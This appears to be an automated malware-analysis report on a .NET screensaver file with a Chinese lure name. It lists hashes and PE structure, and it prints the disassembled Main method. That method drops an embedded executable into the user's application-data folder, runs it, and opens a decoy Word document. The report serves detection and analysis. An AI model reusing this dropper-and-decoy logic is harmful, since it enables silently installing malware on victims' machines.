Malicious

7cb4d7369fc1e8c34a960cbe326df323

PE Executable | MD5: 7cb4d7369fc1e8c34a960cbe326df323 | Size: 909.31 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Very low

Hash | Hash Value
MD5 | 7cb4d7369fc1e8c34a960cbe326df323
Sha1 | c52ae828e01f0a5416c971ad8e1ccdc337a50081
Sha256 | 7e67ca62a4743801afd4328a7ff558c84d76a09844b823ed1bb2de3de82d59ab
Sha384 | 1c428941a8a2a2866bdf49962cbb41665bd78b797d0bef27ee4118c14b8e47ffb48828d5e94f944c6b99a2827603d5b6
Sha512 | 66e4ccd0000acc9f69aa0d8125b42f509e5a222619b5e9dcc0a3d6322779f62c24e63b3505d9cf242c0b558fb27c357f77daaf316214340d1b45c3d3b491ba98
SSDeep | 6144:ax6V1dz+PR6Cc4lhjU3ayN4s3wOpVM0pJ0Q+OGJfXgXsDiaZu0Ic2p7J94+OXRy3:aM0Vc43ZyNU0XJjGJfX3+zBSQqiChl
TLSH | 161517D1D98440A0EC2A9F3480721D35A1777FA9FFBCB28B6E5176662B731D2643A703

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
[Repaired @0x00050C48]
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
.Net Resources
Malicious
files.resources
Malicious
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.fptable
.rsrc
.reloc
Resources
RT_MANIFEST
ID:0001
ID:1033
dyozSCHUMr
[Content_Types].xml
_rels
.rels
customXml
_rels
item1.xml.rels
item1.xml
itemProps1.xml
docProps
app.xml
core.xml
custom.xml
word
_rels
document.xml.rels
document.xml
fontTable.xml
settings.xml
styles.xml
theme
theme1.xml
[Repaired @0x0004FB34]
Malicious
Informations
Name | Value
Info | PE Detect: PeReader OK (file layout)
Module Name | 46岁的老鲫鱼 首冲3万.Scr
Full Name | 46岁的老鲫鱼 首冲3万.Scr
EntryPoint | System.Void Bound.Open::Main()
Scope Name | 46岁的老鲫鱼 首冲3万.Scr
Scope Type | ModuleDef
Kind | Windows
Runtime Version | v2.0.50727
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | 46岁的老鲫鱼 首冲3万
Assembly Version | 0.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | <null>
Total Strings | 7
Main Method | System.Void Bound.Open::Main()
Main IL Instruction Count | 43

Main IL

ldstr files
call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly)
stloc.0 <null>
ldc.i4.s 28
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr _ZjyYHX_Hp.exe
call System.String System.String::Concat(System.String,System.String)
ldloc.0 <null>
ldstr QplRhmKMON
callvirt System.Object System.Resources.ResourceManager::GetObject(System.String)
castclass System.Byte[]
call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[])
ldc.i4.s 28
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr _ZjyYHX_Hp.exe
call System.String System.String::Concat(System.String,System.String)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String)
pop <null>
ldc.i4.s 28
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr CPxTQiAzec.docx
call System.String System.String::Concat(System.String,System.String)
ldloc.0 <null>
ldstr dyozSCHUMr
callvirt System.Object System.Resources.ResourceManager::GetObject(System.String)
castclass System.Byte[]
call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[])
ldc.i4.s 28
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr CPxTQiAzec.docx
call System.String System.String::Concat(System.String,System.String)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String)
pop <null>
leave.s IL_00A0: ret
stloc.1 <null>
ldloc.1 <null>
callvirt System.String System.Exception::get_Message()
call System.Void System.Console::WriteLine(System.String)
call System.Int32 System.Console::Read()
pop <null>
leave.s IL_00A0: ret
ret <null>
